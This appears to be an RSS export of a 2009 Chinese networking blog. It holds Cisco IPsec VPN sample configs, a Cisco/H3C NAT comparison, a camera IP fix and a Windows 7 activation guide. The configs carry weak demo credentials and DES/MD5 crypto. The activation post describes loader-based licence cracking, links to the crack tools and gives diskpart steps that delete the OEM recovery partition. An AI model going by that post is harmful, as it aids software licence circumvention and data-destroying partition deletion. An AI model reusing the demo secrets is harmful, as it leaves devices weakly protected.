enable secret 5 $1$DOX3$rIrxEnTVTw/7LNbxi.akz0<br>
<br>
!<br>
ip subnet-zero<br>
no ip domain-lookup<br>
!<br>
<br>
!<br>
crypto isakmp policy 10<br>
hash md5<br>
authentication pre-share<br>
crypto isakmp key cisco123 address 200.1.1.1<br>
! <br>
!<br>
crypto ipsec transform-set myset esp-des esp-md5-hmac <br>
!<br>
crypto map mymap 10 ipsec-isakmp <br>
set peer 200.1.1.1<br>
set transform-set myset <br>
match address 110<br>
!<br>
!<br>
!<br>
!<br>
interface Loopback0<br>
ip address 172.16.1.1 255.255.255.0<br>
!<br>
interface Ethernet0<br>
ip address 200.1.2.1 255.255.255.0<br>
no ip route-cache<br>
no ip mroute-cache<br>
crypto map mymap<br>
!<br>
<br>
.<br>
.<br>
<br>
!--- Output suppressed.<br>
<br>
.<br>
.<br>
ip classless<br>
ip route 10.1.1.0 255.255.255.0 Ethernet0<br>
ip route 192.168.1.0 255.255.255.0 Ethernet0<br>
ip route 200.1.0.0 255.255.0.0 Ethernet0<br>
no ip http server<br>
<br>
!<br>
access-list 110 permit ip 172.16.1.0 0.0.0.255 10.1.1.0 0.0.0.255<br>
access-list 110 permit ip 172.16.1.0 0.0.0.255 192.168.1.0 0.0.0.255<br>
!<br>
<br>
end<br>
2509a#<br>
<br>
<br>
<br>
Spoke 2 Router<br>
<br>
VPN2509#show running-config<br>
Building configuration...<br>
Current configuration : 1117 bytes<br>
!<br>
version 12.2<br>
<br>
service timestamps debug datetime msec<br>
service timestamps log uptime<br>
service password-encryption<br>
!<br>
hostname VPN2509<br>
!<br>
<br>
!<br>
ip subnet-zero<br>
no ip domain-lookup<br>
!<br>
<br>
!<br>
crypto isakmp policy 10<br>
hash md5<br>
authentication pre-share<br>
crypto isakmp key cisco123 address 200.1.1.1<br>
!<br>
! <br>
crypto ipsec transform-set myset esp-des esp-md5-hmac <br>
!<br>
crypto map mymap 10 ipsec-isakmp <br>
set peer 200.1.1.1<br>
set transform-set myset <br>
match address 120<br>
!<br>
!<br>
!<br>
!<br>
interface Loopback0<br>
ip address 192.168.1.1 255.255.255.0<br>
!<br>
interface Ethernet0<br>
ip address 200.1.3.1 255.255.255.0<br>
<br>
!--- No ip route-cache.<br>
<br>
no ip mroute-cache<br>
crypto map mymap<br>
!<br>
<br>
.<br>
.<br>
<br>
!--- Output suppressed.<br>
<br>
.<br>
.<br>
ip classless<br>
ip route 10.1.1.0 255.255.255.0 Ethernet0<br>
ip route 172.16.0.0 255.255.0.0 Ethernet0<br>
ip route 200.1.0.0 255.255.0.0 Ethernet0<br>
no ip http server<br>
<br>
!<br>
access-list 120 permit ip 192.168.1.0 0.0.0.255 172.16.1.0 0.0.0.255<br>
access-list 120 permit ip 192.168.1.0 0.0.0.255 10.1.1.0 0.0.0.255<br>
!<br>
<br>
end<br>
<br>
<br>
<br>
</font><font size="3"><font face="宋体,verdana, arial, helvetica">三、路由器-路由器以及VPN Client之间的VPN<br>
<span><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/panhc007/pic/item/6de73209826366e03ac76302.jpg"><br>
</span><br>
</font>Cisco 2611 Router<br>
<br>
vpn2611#show run<br>
Building configuration...<br>
<br>
Current configuration : 2265 bytes<br>
!<br>
version 12.2<br>
service timestamps debug uptime<br>
service timestamps log uptime<br>
no service password-encryption<br>
!<br>
hostname vpn2611<br>
!<br>
<br>
!--- Enable aaa for user authentication <br>
!--- and group authorization.<br>
<br>
aaa new-model<br>
!<br>
!<br>
<br>
!--- To enable X-Auth for user authentication, <br>
!--- enable the aaa authentication commands.<br>
<br>
aaa authentication login userauthen local<br>
<br>
<br>
!--- To enable group authorization, enable <br>
!--- the aaa authorization commands.<br>
<br>
aaa authorization network groupauthor local <br>
aaa session-id common<br>
!<br>
<br>
<br>
!--- For local authentication of the IPSec user, <br>
!--- create the user with password.<br>
<br>
username cisco password 0 cisco<br>
ip subnet-zero<br>
!<br>
!<br>
!<br>
ip audit notify log<br>
ip audit po max-events 100<br>
!<br>
<br>
<br>
!--- Create an Internet Security Association and <br>
!--- Key Management Protocol (ISAKMP) <br>
!--- policy for Phase 1 negotiations for the VPN 3.x clients.<br>
<br>
crypto isakmp policy 3<br>
encr 3des<br>
authentication pre-share<br>
group 2<br>
!<br>
<br>
<br>
!--- Create an ISAKMP policy for Phase 1 <br>
!--- negotiations for the LAN-to-LAN tunnels.<br>
<br>
crypto isakmp policy 10<br>
hash md5<br>
authentication pre-share<br>
<br>
<br>
!--- Specify the PreShared key for the LAN-to-LAN tunnel. <br>
!--- Make sure that you use <br>
!--- no-xauth parameter with your ISAKMP key.<br>
<br>
crypto isakmp key cisco123 address 172.18.124.199 no-xauth<br>
!!<br>
<br>
<br>
!--- Create a group that will be used to <br>
!--- specify the WINS, DNS servers' address<br>
!--- to the client, along with the pre-shared <br>
!--- key for authentication.<br>
<br>
crypto isakmp client configuration group 3000client<br>
key cisco123<br>
dns 10.10.10.10<br>
wins 10.10.10.20<br>
domain cisco.com<br>
pool ippool<br>
!!<br>
!<br>
<br>
<br>
!--- Create the Phase 2 Policy for actual data encryption.<br>
<br>
crypto ipsec transform-set myset esp-3des esp-md5-hmac <br>
!<br>
<br>
<br>
!--- Create a dynamic map and apply <br>
!--- the transform set that was created above.<br>
<br>
crypto dynamic-map dynmap 10<br>
set transform-set myset <br>
!<br>
!<br>
<br>
<br>
!--- Create the actual crypto map, and <br>
!--- apply the aaa lists that were created <br>
!--- earlier. Also create a new instance for your <br>
!--- LAN-to-LAN tunnel. Specify the peer IP address, <br>
!--- transform set and an Access Control List (ACL) for this <br>
!--- instance.<br>
<br>
crypto map clientmap client authentication list userauthen<br>
crypto map clientmap isakmp authorization list groupauthor<br>
crypto map clientmap client configuration address respond<br>
crypto map clientmap 1 ipsec-isakmp <br>
set peer 172.18.124.199<br>
set transform-set myset <br>
match address 100<br>
crypto map clientmap 10 ipsec-isakmp dynamic dynmap <br>
!<br>
!<br>
fax interface-type fax-mail<br>
mta receive maximum-recipients 0<br>
!<br>
!<br>
<br>
<br>
!--- Apply the crypto map on the outside interface.<br>
<br>
interface Ethernet0/0<br>
ip address 172.18.124.159 255.255.255.0<br>
half-duplex<br>
crypto map clientmap<br>
!<br>
interface Serial0/0<br>
no ip address<br>
shutdown<br>
!<br>
interface Ethernet0/1<br>
ip address 10.10.10.1 255.255.255.0<br>
no keepalive<br>
half-duplex<br>
!<br>
!<br>
<br>
!--- Create a pool of addresses to be <br>
!--- assigned to the VPN Clients.<br>
<br>
ip local pool ippool 14.1.1.100 14.1.1.200<br>
ip classless<br>
ip route 0.0.0.0 0.0.0.0 172.18.124.1<br>
ip http server<br>
ip pim bidir-enable<br>
!<br>
!<br>
<br>
<br>
!--- Create an ACL for the traffic <br>
!--- to be encrypted. In this example, <br>
!--- the traffic from 10.10.10.0/24 to 10.10.20.0/24 <br>
!--- would be encrypted.<br>
<br>
access-list 100 permit ip 10.10.10.0 0.0.0.255 10.10.20.0 0.0.0.255<br>
!<br>
!<br>
snmp-server community foobar RO<br>
call rsvp-sync<br>
!<br>
!<br>
mgcp profile default<br>
!<br>
dial-peer cor custom<br>
!<br>
!<br>
line con 0<br>
exec-timeout 0 0<br>
line aux 0<br>
line vty 0 4<br>
!<br>
!<br>
end<br>
<br>
<br>
<br>
Configuring the 3640 Router<br>
Cisco 3640 Router<br>
<br>
vpn3640#show run<br>
Building configuration...<br>
<br>
Current configuration : 1287 bytes<br>
!<br>
! Last configuration change at 13:47:37 UTC Wed Mar 6 2002<br>
!<br>
version 12.2<br>
service timestamps debug uptime<br>
service timestamps log uptime<br>
no service password-encryption<br>
!<br>
hostname vpn3640<br>
!<br>
!<br>
ip subnet-zero<br>
ip cef<br>
!<br>
<br>
!--- Create an ISAKMP policy for Phase 1 <br>
!--- negotiations for the LAN-to-LAN tunnels.<br>
<br>
crypto isakmp policy 10<br>
hash md5<br>
authentication pre-share<br>
<br>
<br>
!--- Specify the PreShared key for the LAN-to-LAN <br>
!--- tunnel. You do not have to add<br>
!--- X-Auth parameter, as this <br>
!--- router is not doing Cisco Unity Client IPSEC <br>
!--- authentication.<br>
<br>
crypto isakmp key cisco123 address 172.18.124.159<br>
!<br>
!<br>
<br>
<br>
!--- Create the Phase 2 Policy for actual data encryption.<br>
<br>
crypto ipsec transform-set myset esp-3des esp-md5-hmac <br>
!<br>
<br>
<br>
!--- Create the actual crypto map. Specify <br>
!--- the peer IP address, transform<br>
!--- set and an ACL for this instance.<br>
<br>
crypto map mymap 10 ipsec-isakmp <br>
set peer 172.18.124.159<br>
set transform-set myset <br>
match address 100<br>
!<br>
call RSVP-sync<br>
!<br>
!<br>
!<br>
<br>
<br>
!--- Apply the crypto map on the outside interface.<br>
<br>
interface Ethernet0/0<br>
ip address 172.18.124.199 255.255.255.0<br>
half-duplex<br>
crypto map mymap<br>
!<br>
interface Ethernet0/1<br>
ip address 10.10.20.1 255.255.255.0<br>
half-duplex<br>
!<br>
ip classless<br>
ip route 0.0.0.0 0.0.0.0 172.18.124.1<br>
ip http server<br>
ip pim bidir-enable<br>
!<br>
<br>
<br>
!--- Create an ACL for the traffic to <br>
!--- be encrypted. In this example,<br>
!--- the traffic from 10.10.20.0/24 to 10.10.10.0/24 <br>
!--- would be encrypted.<br>
<br>
access-list 100 permit ip 10.10.20.0 0.0.0.255 10.10.10.0 0.0.0.255<br>
snmp-server community foobar RO<br>
!<br>
dial-peer cor custom<br>
!<br>
!<br>
line con 0<br>
exec-timeout 0 0<br>
line aux 0<br>
line vty 0 4<br>
login<br>
!<br>
end<br>
</font></p>
</div>
</div> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/panhc007/blog/category/cisco%CD%F8%C2%E7%BC%BC%CA%F5">cisco网络技术</a>&nbsp;<a href="http://hi.baidu.com/panhc007/blog/item/da4c844379f76a1972f05dc4.html#comment">查看评论</a>]]></description>
        <pubDate>2009-11-19  15:19</pubDate>
        <category><![CDATA[cisco网络技术]]></category>
        <author><![CDATA[panhc007]]></author>
		<guid>http://hi.baidu.com/panhc007/blog/item/da4c844379f76a1972f05dc4.html</guid>
</item>

<item>
        <title><![CDATA[部分不能激活Win 7 的问题分析和解决方案]]></title>
        <link><![CDATA[http://hi.baidu.com/panhc007/blog/item/2297701f2d2b72c2a68669a1.html]]></link>
        <description><![CDATA[
		
		<div class="entry">
<h4><span class="Apple-style-span" style="word-spacing: 0px; font: medium/27px Simsun; text-transform: none; color: #000000; text-indent: 0px; white-space: normal; letter-spacing: normal; border-collapse: separate; widows: 2; orphans: 2; webkit-border-horizontal-spacing: 0px; webkit-border-vertical-spacing: 0px; webkit-text-decorations-in-effect: none; webkit-text-size-adjust: auto; webkit-text-stroke-width: 0px"><span class="Apple-style-span" style="font-size: 14px; color: #404040; line-height: 21px; ">
<h2 style="font-weight: normal; font-size: 16px; margin: 0px 0px 5px; color: #404040; line-height: 24px"><span class="Apple-style-span" style="word-spacing: 0px; font: medium Simsun; text-transform: none; color: #000000; text-indent: 0px; white-space: normal; letter-spacing: normal; border-collapse: separate; widows: 2; orphans: 2; webkit-border-horizontal-spacing: 0px; webkit-border-vertical-spacing: 0px; webkit-text-decorations-in-effect: none; webkit-text-size-adjust: auto; webkit-text-stroke-width: 0px"><span class="Apple-style-span" style="font-size: 14px; line-height: 21px; ">
<h2 style="text-indent: 0in! important"><span style="font-size: 24pt; ">前言 </span></h2>
<p style="padding-right: 0em! important; padding-left: 0em! important; padding-bottom: 0em! important; margin: 5px auto; text-indent: 0in! important; padding-top: 0em! important"><font size="3">总所周知，目前Win7的激活程序多如牛毛，但总有些朋友的机器就是激活不了，以至于要刷BIOS等高危操作。</font></p>
<div style="text-indent: 0in! important"><font size="3">本文通过对Win7激活程序的原理分析，介绍一种能够解决大部分OEM版系统激活Win7的方法，希望能够帮助需要的朋友。</font></div>
<div style="text-indent: 0in! important"> </div>
<h2 style="text-indent: 0in! important"><span style="font-size: 24pt; ">问题分析 </span></h2>
<p style="padding-right: 0em! important; padding-left: 0em! important; padding-bottom: 0em! important; margin: 5px auto; text-indent: 0in! important; padding-top: 0em! important"><font size="3">目前以PCSKYS_Windows7Loader为代表的一系列win7激活程序， 大多是基于通过找到硬盘上的系统引导区，并导入SLIC+证书文件，再导入OEM密钥来实现系统的激活，这需要直接在低级状态下找到硬盘的引导区。然而，如果硬盘上有未分配卷标的隐藏分区，那么激活程序将无法找到硬盘的引导区，从而使得破解失败！</font></p>
<p style="padding-right: 0em! important; padding-left: 0em! important; padding-bottom: 0em! important; margin: 5px auto; text-indent: 0in! important; padding-top: 0em! important"><font size="3"> </font></p>
<p style="padding-right: 0em! important; padding-left: 0em! important; padding-bottom: 0em! important; margin: 5px auto; text-indent: 0in! important; padding-top: 0em! important"><font size="3"><strong style="text-indent: 0in! important">原因1. </strong>如果在安装win7时选择为系统引导区专门分出100M的话，将会在硬盘中分出一个<strong style="text-indent: 0in! important">没有卷标的</strong>系统保留区，如下图：</font></p>
<p style="padding-right: 0em! important; padding-left: 0em! important; padding-bottom: 0em! important; margin: 5px auto; text-indent: 0in! important; padding-top: 0em! important"><span><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/panhc007/pic/item/3df7ec38e980faecd46225bc.jpg"><br>
</span> </p>
<p style="padding-right: 0em! important; padding-left: 0em! important; padding-bottom: 0em! important; margin: 5px auto; text-indent: 0in! important; padding-top: 0em! important"> </p>
<p style="padding-right: 0em! important; padding-left: 0em! important; padding-bottom: 0em! important; margin: 5px auto; text-indent: 0in! important; padding-top: 0em! important"><font size="3"><strong style="text-indent: 0in! important">原因2. </strong>相当多的品牌机（包括台式和笔记本）拥有内置的系统还原功能，把还原内容存储在EISA配置的隐藏分区里面，一般的软件都无法对其进行操作，保证分区及系统还原的安全性，如图，我们不能对它做任何操作（只有&ldquo;帮助&rdquo;）：</font></p>
<p style="padding-right: 0em! important; padding-left: 0em! important; padding-bottom: 0em! important; margin: 5px auto; text-indent: 0in! important; padding-top: 0em! important"><span><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/panhc007/pic/item/9e8dc1ee73cf8f072cf534bc.jpg"><br>
</span><font size="3"> </font></p>
<p style="padding-right: 0em! important; padding-left: 0em! important; padding-bottom: 0em! important; margin: 5px auto; text-indent: 0in! important; padding-top: 0em! important"><font size="3">但也正因为这个可恶的&ldquo;隐藏分区&rdquo;，使得win7激活程序找不到硬盘的引导区，从而导致系统不能激活！</font></p>
<p style="padding-right: 0em! important; padding-left: 0em! important; padding-bottom: 0em! important; margin: 5px auto; text-indent: 0in! important; padding-top: 0em! important"><font size="3"> </font></p>
<p style="padding-right: 0em! important; padding-left: 0em! important; padding-bottom: 0em! important; margin: 5px auto; text-indent: 0in! important; padding-top: 0em! important"><font size="3"><br style="text-indent: 0in! important">
</font></p>
<h2 style="text-indent: 0in! important"><span style="font-size: 24pt; "><font size="5">解决方案</font></span></h2>
<p style="padding-right: 0em! important; padding-left: 0em! important; padding-bottom: 0em! important; margin: 5px auto; text-indent: 0in! important; padding-top: 0em! important"><font size="3">针对<strong style="text-indent: 0in! important">原因1</strong>，目前大多激活程序也给用户提供了明显的提示：</font></p>
<p style="padding-right: 0em! important; padding-left: 0em! important; padding-bottom: 0em! important; margin: 5px auto; text-indent: 0in! important; padding-top: 0em! important"> <span><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/panhc007/pic/item/43d68cf9eafad577242df2bc.jpg"><br>
</span></p>
<p style="padding-right: 0em! important; padding-left: 0em! important; padding-bottom: 0em! important; margin: 5px auto; text-indent: 0in! important; padding-top: 0em! important"><font size="3">我们只要根据提示，将系统保留区分配一个卷标即可：</font></p>
<p style="padding-right: 0em! important; padding-left: 0em! important; padding-bottom: 0em! important; margin: 5px auto; text-indent: 0in! important; padding-top: 0em! important"><span><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/panhc007/pic/item/eac0d318cdb56f9a4bedbcbc.jpg"><br>
</span> </p>
<p style="padding-right: 0em! important; padding-left: 0em! important; padding-bottom: 0em! important; margin: 5px auto; text-indent: 0in! important; padding-top: 0em! important"> </p>
<p style="padding-right: 0em! important; padding-left: 0em! important; padding-bottom: 0em! important; margin: 5px auto; text-indent: 0in! important; padding-top: 0em! important"><font size="3">而针对<strong style="text-indent: 0in! important">原因2</strong>，我们需要执行一些命令行操作，来删除&ldquo;OEM隐藏分区&rdquo;，从而使激活程序能够顺利找到硬盘的引导区，进行激活。</font></p>
<p style="padding-right: 0em! important; padding-left: 0em! important; padding-bottom: 0em! important; margin: 5px auto; text-indent: 0in! important; padding-top: 0em! important"><font size="3"> </font></p>
<p style="padding-right: 0em! important; padding-left: 0em! important; padding-bottom: 0em! important; margin: 5px auto; text-indent: 0in! important; padding-top: 0em! important"><font size="3"><span class="Apple-style-span" style="font-size: 13px; text-indent: 0in! important"><span style="color: #000000; text-indent: 0in! important"><span class="Apple-style-span" style="font-size: 13px; text-indent: 0in! important"><span style="color: #000000; text-indent: 0in! important"> </span></span></span></span></font>
<p style="padding-right: 0em! important; padding-left: 0em! important; padding-bottom: 0em! important; margin: 5px auto; text-indent: 0in! important; padding-top: 0em! important"> </p>
<p style="padding-right: 0em! important; padding-left: 0em! important; padding-bottom: 0em! important; margin: 5px auto; text-indent: 0in! important; padding-top: 0em! important"><span><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/panhc007/pic/item/c311f28660d8ca1066096eb3.jpg"><br>
</span> </p>
<p style="padding-right: 0em! important; padding-left: 0em! important; padding-bottom: 0em! important; margin: 5px auto; text-indent: 0in! important; padding-top: 0em! important"> </p>
<p style="padding-right: 0em! important; padding-left: 0em! important; padding-bottom: 0em! important; margin: 5px auto; text-indent: 0in! important; padding-top: 0em! important">如图所示，OEM隐藏分区已被成功删除：</p>
<p style="padding-right: 0em! important; padding-left: 0em! important; padding-bottom: 0em! important; margin: 5px auto; text-indent: 0in! important; padding-top: 0em! important"><span><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/panhc007/pic/item/5ed13b06135abf55030881b3.jpg"><br>
</span> </p>
<p style="padding-right: 0em! important; padding-left: 0em! important; padding-bottom: 0em! important; margin: 5px auto; text-indent: 0in! important; padding-top: 0em! important"> </p>
<p style="padding-right: 0em! important; padding-left: 0em! important; padding-bottom: 0em! important; margin: 5px auto; text-indent: 0in! important; padding-top: 0em! important">接下来，就可以使用激活程序对Win7进行激活了，最后奉上Win7激活程序大全和硬盘安装Win7工具，</p>
<p style="padding-right: 0em! important; padding-left: 0em! important; padding-bottom: 0em! important; margin: 5px auto; text-indent: 0in! important; padding-top: 0em! important"><span><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/panhc007/pic/item/3aed619b40f4ee9bc8eaf4b3.jpg"><br>
</span></p>
<p style="padding-right: 0em! important; padding-left: 0em! important; padding-bottom: 0em! important; margin: 5px auto; text-indent: 0in! important; padding-top: 0em! important">请到我的skydrive下载：</p>
<p style="padding-right: 0em! important; padding-left: 0em! important; padding-bottom: 0em! important; margin: 5px auto; text-indent: 0in! important; padding-top: 0em! important"><a style="text-indent: 0in! important" href="http://cid-74fe5b3dbec6b75b.skydrive.live.com/browse.aspx/.Public?uc=2" target="_blank"><font color="#3d81ee">http://cid-74fe5b3dbec6b75b.skydrive.live.com/browse.aspx/.Public?uc=2</font></a></p>
<p style="padding-right: 0em! important; padding-left: 0em! important; padding-bottom: 0em! important; margin: 5px auto; text-indent: 0in! important; padding-top: 0em! important"> </p>
<h2 style="text-indent: 0in! important">补充</h2>
<p style="padding-right: 0em! important; padding-left: 0em! important; padding-bottom: 0em! important; margin: 5px auto; text-indent: 0in! important; padding-top: 0em! important"> 就在写文章的同时，又遇到了一个类似的问题&ldquo;<strong style="text-indent: 0in! important">使用双硬盘的机器无法激活</strong>&rdquo;原理与本文中介绍的<strong style="text-indent: 0in! important">原因1、原因2</strong>相似，解决方案，当然是拔掉从盘，之留下主盘，进行激活&mdash;&mdash;成功！</p>
<p style="padding-right: 0em! important; padding-left: 0em! important; padding-bottom: 0em! important; margin: 5px auto; text-indent: 0in! important; padding-top: 0em! important"> </p>
</p>
<div class="cnblogs_code" style="border-right: #cccccc 1px solid; padding-right: 5px; border-top: #cccccc 1px solid; padding-left: 4px; font-size: 13px; padding-bottom: 4px; border-left: #cccccc 1px solid; width: 700px; word-break: break-all; text-indent: 0in! important; padding-top: 4px; border-bottom: #cccccc 1px solid; background-color: #eeeeee">
<p><span style="color: #000000; text-indent: 0in! important"><font size="3"><span class="Apple-style-span" style="font-size: 13px; text-indent: 0in! important"><span style="color: #000000; text-indent: 0in! important">1</span><span style="color: #000000; text-indent: 0in! important">：使用&ldquo;Run As Administrator&rdquo;方式打开cmd，输入&ldquo;diskpart&rdquo;并确定，启动diskpart.exe程序</span></span>　</font></span><font size="3"><span style="color: #000000; text-indent: 0in! important">　<br style="text-indent: 0in! important">
</span><span style="color: #000000; text-indent: 0in! important">2</span></font><font size="3"><span style="color: #000000; text-indent: 0in! important">：输入&ldquo;list disk&rdquo;敲回车，显示磁盘列表<br style="text-indent: 0in! important">
　　<br style="text-indent: 0in! important">
</span><span style="color: #000000; text-indent: 0in! important">3</span><span style="color: #000000; text-indent: 0in! important">：输入&ldquo;select disk 磁盘号&rdquo;（例&ldquo;selectdisk </span><span style="color: #000000; text-indent: 0in! important">0</span></font><font size="3"><span style="color: #000000; text-indent: 0in! important">&rdquo;） 敲回车，将选择相应的磁盘。<br style="text-indent: 0in! important">
　　<br style="text-indent: 0in! important">
</span><span style="color: #000000; text-indent: 0in! important">4</span></font><font size="3"><span style="color: #000000; text-indent: 0in! important">：输入&ldquo;list partition&rdquo;命令，敲回车，显示所选择磁盘的分区<br style="text-indent: 0in! important">
　　<br style="text-indent: 0in! important">
</span><span style="color: #000000; text-indent: 0in! important">5</span><span style="color: #000000; text-indent: 0in! important">：输入&ldquo;select partition 分区号&rdquo;并确认，选择隐藏分区的分区号，在此我们选择OEM盘即 select partition </span><span style="color: #000000; text-indent: 0in! important">1</span></font><font size="3"><span style="color: #000000; text-indent: 0in! important">。<br style="text-indent: 0in! important">
　　<br style="text-indent: 0in! important">
</span><span style="color: #000000; text-indent: 0in! important">6</span><span style="color: #000000; text-indent: 0in! important">：输入&ldquo;delete partition override &rdquo;即可删除当前选择的分区。</span></font></p>
</div>
<p style="padding-right: 0em! important; padding-left: 0em! important; padding-bottom: 0em! important; margin: 5px auto; text-indent: 0in! important; padding-top: 0em! important"> </p>
<span class="Apple-style-span" style="font-size: 13px; text-indent: 0in! important"><span style="color: #000000; text-indent: 0in! important">
<p style="padding-right: 0em! important; padding-left: 0em! important; padding-bottom: 0em! important; margin: 5px auto; text-indent: 0in! important; padding-top: 0em! important"><font size="4">打开cmd，输入&ldquo;diskpart&rdquo;并确定，启动diskpart.exe程序</font></p>
</span></span></span></span></h2>
</span></span></h4>
<div >
<p style="border-right: #e0e0e0 1px dashed; padding-right: 10px; border-top: #e0e0e0 1px dashed; padding-left: 60px; background: url(http://www.cnblogs.com/images/cnblogs_com/lyj/o_info.png) #fffeee no-repeat 1% 50%; padding-bottom: 10px; border-left: #e0e0e0 1px dashed; padding-top: 10px; border-bottom: #e0e0e0 1px dashed; "><br>
作者：<a href="http://blodfox777.cnblogs.com/" target="_blank"><font color="#3d81ee">Lance Zhang</font></a>（<a href="http://blodfox777.cnblogs.com/" target="_blank"><font color="#3d81ee">Lance Zhang's Tech Blog</font></a>）<br>
出处：<a href="http://blodfox777.cnblogs.com/" target="_blank"><font color="#3d81ee">http://blodfox777.cnblogs.com/</font></a></p>
</div>
</div> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/panhc007/blog/category/%BC%BC%CA%F5%CE%C4%D5%C2">技术文章</a>&nbsp;<a href="http://hi.baidu.com/panhc007/blog/item/2297701f2d2b72c2a68669a1.html#comment">查看评论</a>]]></description>
        <pubDate>2009-11-11  08:37</pubDate>
        <category><![CDATA[技术文章]]></category>
        <author><![CDATA[panhc007]]></author>
		<guid>http://hi.baidu.com/panhc007/blog/item/2297701f2d2b72c2a68669a1.html</guid>
</item>

<item>
        <title><![CDATA[cisco与H3C nat配置对比]]></title>
        <link><![CDATA[http://hi.baidu.com/panhc007/blog/item/28f078f551a9132fbd31095f.html]]></link>
        <description><![CDATA[
		
		<p><font size="4">静态NAT</font></p>
<p><font size="4">cisco：<br>
ip nat inside source static 192.168.1.10 200.1.1.1<br>
inte fa0/0<br>
ip nat inside<br>
inte fa0/2<br>
ip nat outside</font></p>
<p><font size="4">H3C:<br>
nat static 192.168.10.1 200.1.1.1<br>
interface s0/2/0<br>
nat out static</font></p>
<p><font size="4">动态NAT和PAT</font></p>
<p><font size="4">cisco:<br>
acc-list 1 permit 192.168.10.0 0.0.0.255&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  --定义需要转换的IP地址<br>
ip nat pool cnc 200.1.1.1 200.1.1.10 netmask 255.255.255.0&nbsp;&nbsp;  --定义地址池<br>
ip nat inside source list 1 pool cnc （overload）&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  --调用地址池</font></p>
<p><font size="4">H3C：<br>
定义访问列表:<br>
acl number 2000&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  <br>
rule 10 permit source 192.168.10.0 0.0.0.255<br>
定义地址池：<br>
nat address-group 1 200.1.1.1 200.1.1.10 <br>
接口下调用NAT：<br>
inte s0/2/0<br>
nat out 2000 address-group 1 no-pat (注意，h3C默认情况下是PAT，如果不想用PAT，在后面加no-pat)</font></p>
<p> </p>
<p><font size="4">++++++++++++++++++++++++++++++++++</font></p>
<font size="4">
<p><font color="#ff0000" size="3">cisco做端口映射：</font></p>
<p><font size="3">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  （1）、在内部本地地址与内部合法地址之间建立静态地址转换。在全局设置状态下输入：</font></p>
<p><font size="3">　　　　Ip nat inside source static tcp 192.168.1.254 80 202.103.23.123 80<br>
　　　　Ip nat inside source static udp 192.168.1.254 80 202.103.23.123 80</font></p>
<p><font size="3">　（2）、指定连接网络的内部端口 在端口设置状态下输入：</font></p>
<p><font size="3">　　　　　ip nat inside</font></p>
<p><font size="3">　（3）、指定连接外部网络的外部端口 在端口设置状态下输入：</font></p>
<p><font size="3">　　　　　ip nat outside</font></p>
<p><font color="#ff0000" size="3">在hauwei做nat：</font></p>
<p><font size="3">int eth0/1<br>
nat server protocol tcp global 202.103.23.123 80 inside 192.168.1.254 80</font></p>
</font> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/panhc007/blog/category/cisco%CD%F8%C2%E7%BC%BC%CA%F5">cisco网络技术</a>&nbsp;<a href="http://hi.baidu.com/panhc007/blog/item/28f078f551a9132fbd31095f.html#comment">查看评论</a>]]></description>
        <pubDate>2009-11-02  11:02</pubDate>
        <category><![CDATA[cisco网络技术]]></category>
        <author><![CDATA[panhc007]]></author>
		<guid>http://hi.baidu.com/panhc007/blog/item/28f078f551a9132fbd31095f.html</guid>
</item>

<item>
        <title><![CDATA[今天解决了摄像头ip设置问题]]></title>
        <link><![CDATA[http://hi.baidu.com/panhc007/blog/item/bb35df132838e1daf6039e67.html]]></link>
        <description><![CDATA[
		
		<p><font size="3">今天解决了摄像头ip设置问题，</font></p>
<p><font size="3">现象描述：</font></p>
<p><font size="3">基于网络的摄像头ip混乱，在进行ip规划后，对摄像头重新设置ip。</font></p>
<p><font size="3">但是对摄像头进行ip修改时，发现无法修改，比如将IP217修改为212，摄像头下线后，再也搜索不到， </font></p>
<p><font size="3">或者将217修改为212，点击确认，ip自动变回217.....</font></p>
<p><font size="3">随意修改几个都难以成功，反而很多摄像头的画面丢失了。</font></p>
<p><font size="3">故障分析：</font></p>
<p><font size="3">很明显这个是由于IP冲突造成的，IP冲突那么网络视频录像机NVR将无法进行管理，画面就会丢失。</font></p>
<p><font size="3">总结：</font></p>
<p><font size="3">通过NVR修改摄像头参数失败，唯一的解决方法是：</font></p>
<p><font size="3">1、将连接摄像头的网线从各个楼层拔下来；<br>
2、在手提电脑安装摄像头管理软件，去各楼层连接摄像头网线去单独管理摄像头修改IP；<br>
3、修改完后不要把网线插回去，继续让之离线<br>
4、全部修改完后，将摄像头的网线接入楼层交换。<br>
5、在NVR进行管理。<br>
</font></p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/panhc007/blog/category/%B8%F6%C8%CB%D7%DC%BD%E1%28%D4%AD%B4%B4%29">个人总结(原创)</a>&nbsp;<a href="http://hi.baidu.com/panhc007/blog/item/bb35df132838e1daf6039e67.html#comment">查看评论</a>]]></description>
        <pubDate>2009-10-30  21:24</pubDate>
        <category><![CDATA[个人总结(原创)]]></category>
        <author><![CDATA[panhc007]]></author>
		<guid>http://hi.baidu.com/panhc007/blog/item/bb35df132838e1daf6039e67.html</guid>
</item>

<item>
        <title><![CDATA[一个集成项目的整改规划]]></title>
        <link><![CDATA[http://hi.baidu.com/panhc007/blog/item/c451813f7d64ddc87c1e71b0.html]]></link>
        <description><![CDATA[
		
		<p> </p>
<p> </p>
<p><span><span><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/panhc007/pic/item/c7bbd035cdbae43f91ef390a.jpg"><br>
</span><br>
<br>
该项目整改意见：</span></p>
<p><span>1、全部设备使用固定IP、表格化管理；</span></p>
